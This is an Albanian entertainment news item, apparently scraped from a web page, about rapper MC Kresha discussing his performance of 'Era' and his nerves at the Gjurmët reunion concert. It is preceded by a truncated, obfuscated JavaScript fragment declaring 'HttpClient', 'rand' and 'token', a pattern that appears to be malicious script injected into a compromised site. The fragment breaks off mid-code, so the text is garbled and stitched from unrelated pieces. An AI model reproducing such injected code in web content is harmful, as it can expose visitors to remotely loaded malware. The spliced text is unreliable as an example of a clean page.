;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Kur është ndjerë Kresha për herë të parë nën ethe ?!

By

MC Kresha ishte sot i ftuar në emisionin hejWazzup ku edhe performoi bashkë me Enurin, këngën ‘Era’.

Kur u pyet nga Irma se a ishte e vështirë sjellja e ‘Erës’ në një version të ditëve të sotme, ai tha se përgjithësisht nuk ishte e vështirë teksa falemnderues i është Migjenit të grupit ‘Gjurmët’.

Lidhur me ndryshimet në dukje në videoklipin që u komplimentua shumë për realizimin Kresha deklaroi se donte që sytë e tij të tregonin vuajtjen dhe jo kjo të përfshihej në ambientin rrethues.

Reperi tregoi se në koncertin që riktheu grupin legjendar ka shkuar pa asnjë provë teksa megjithëse i druhej rezultatit, mesazhet e njerëzve dhe komplimentet e kanë bërë atë të ndihet mirë.

Ai tha se koncerti jubilar i grupit të Gjurmët dhe presioni i një publiku më ndryshe e kishin bërë atë të ndihet nën ethe.

‘Unë per vete, për herë të parë jom kon nën ethe, shkaku edhe i publikut, mirëpo fakti se unë publikova kangën një ditë më herët ishte një plus i madh’ – deklaroi Kresha.  /Prive.al

 

Artikuj të ngjashëm